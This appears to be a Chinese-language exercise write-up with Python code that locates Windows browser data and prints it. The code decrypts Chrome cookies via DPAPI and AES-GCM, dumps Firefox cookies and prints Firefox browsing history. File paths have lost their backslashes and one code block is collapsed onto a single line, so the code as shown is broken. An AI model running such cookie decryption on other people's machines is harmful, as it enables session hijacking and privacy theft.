第一题
win10系统中本地cookie的存放位置为:
IE浏览器:%APPDATA%MicrosoftWindowscookies 目录中的xxx.txt文件 (IE浏览器分开存放的);
火狐浏览器:%APPDATA%MozillaFirefoxProfiles 目录中的???.default-release或???.default目录,名为cookies.sqlite的文件;
谷歌浏览器:%LOCALAPPDATA%GoogleChromeUser DataDefault 目录中,名为cookies的文件。
使用以下代码获取你所用机器的不同浏览器的cookie的文件夹,并打印输出。
只写了一个谷歌的例子
import os import json import base64 import sqlite3 import win32crypt from cryptography.hazmat.primitives.ciphers.aead import AESGCM # 读取chrome保存在json文件中的key(str) def GetString(LocalState): with open(LocalState, 'r', encoding='utf-8') as f: s = json.load(f)['os_crypt']['encrypted_key'] return s # base64解码,DPAPI解密,得到真实的AESGCM key(bytes) def pull_the_key(base64_encrypted_key): encrypted_key_with_header = base64.b64decode(base64_encrypted_key) encrypted_key = encrypted_key_with_header[5:] key = win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1] return key # AESGCM解密 def DecryptString(key, data): nonce, cipherbytes = data[3:15], data[15:] aesgcm = AESGCM(key) plainbytes = aesgcm.decrypt(nonce, cipherbytes, None) plaintext = plainbytes.decode('utf-8') return plaintext if __name__ == '__main__': UserDataDir = os.environ['LOCALAPPDATA'] + r'GoogleChromeUser Data' LocalStateFilePath = UserDataDir + r'Local State' cookiesFilePath = UserDataDir + r'Defaultcookies' print(cookiesFilePath) con = sqlite3.connect(cookiesFilePath) con.text_factory = bytes res = con.execute('select host_key,name,encrypted_value from cookies').fetchall() con.close() print(res) key = pull_the_key(GetString(LocalStateFilePath)) for i in res: print(i[0], i[1], DecryptString(key, i[2]))
第二题
以下是关于SQL接口的扩展库sqlite3的介绍:
https://www.runoob.com/sqlite/sqlite-python.html
请使用 sqlite3创建一个对cookie数据库文件的数据库连接对象,解析并打印cookies.sqlite文件的内容。
if 'default-release-2' in folds_end:
cookie_fold_index = folds_end.index('default-release-2')
如果没有出现以下结果可以试着手动改上面的default-release-2,可以改为我画红圈的后面的那个数字我这里是default-release-2,你可以改成你自己相应的default-release-xxx,第三题的同样如此
如果后面还是没下面这些输出,可以看看浏览器是否保留cookies
import os
import sqlite3
def get_firfox_cookie_path():
cookiepath_common = os.environ['APPDATA'] + r"MozillaFirefoxProfiles"
folds_arr = os.listdir(cookiepath_common)
folds_end = [os.path.splitext(file)[-1][1:] for file in folds_arr]
print(cookiepath_common,folds_arr)
for i in folds_end:
print(i)
if 'default-release-2' in folds_end:
cookie_fold_index = folds_end.index('default-release-2')
else:
cookie_fold_index = folds_end.index('default')
cookie_fold = folds_arr[cookie_fold_index]
cookie_path = os.path.join(cookiepath_common, cookie_fold)
return os.path.join(cookie_path, 'cookies.sqlite')
def printcookies(cookiesDB):
try:
conn = sqlite3.connect(cookiesDB)
c = conn.cursor()
c.execute('SELECt host, name, value FROM moz_cookies')
for row in c:
host = str(row[0])
name = str(row[1])
value = str(row[2])
print ('Host: ' + host + ', cookie: ' + name + ', Value: ' + value)
except Exception as e:
if 'encrypted' in str(e):
print('Error')
printcookies(get_firfox_cookie_path())
第三题
win10系统中火狐浏览器的书签及其访问记录存放位置为:%APPDATA%MozillaFirefoxProfiles 目录中的xxx.default目录,名为places.sqlite的文件。
要求:使用前两题的方法解析并打印输出win10系统中火狐浏览器的书签及其访问记录。
主要代码:
conn = sqlite3.connect(places.sqlite文件)
c = conn.cursor()
c.execute("select url, datetime(last_visit_date/1000000, 'unixepoch'), title from moz_places;")
import os
import sqlite3
def get_firfox_cookie_path():
cookiepath_common = os.environ['APPDATA'] + r"MozillaFirefoxProfiles"
folds_arr = os.listdir(cookiepath_common)
folds_end = [os.path.splitext(file)[-1][1:] for file in folds_arr]
for i in folds_end:
print(i)
if 'default-release-2' in folds_end:
cookie_fold_index = folds_end.index('default-release-2')
else:
cookie_fold_index = folds_end.index('default')
cookie_fold = folds_arr[cookie_fold_index]
cookie_path = os.path.join(cookiepath_common, cookie_fold)
return os.path.join(cookie_path, 'places.sqlite')
def printcookies(cookiesDB):
try:
conn = sqlite3.connect(cookiesDB)
c = conn.cursor()
c.execute("select url, datetime(last_visit_date/1000000, 'unixepoch'), title from moz_places;")
for row in c:
url = str(row[0])
datetime = str(row[1])
title = str(row[2])
print ('Url: ' + url + ', datatime: ' + datetime + ', title: ' + title)
except Exception as e:
if 'encrypted' in str(e):
print('Error')
printcookies(get_firfox_cookie_path())
运行结果如图
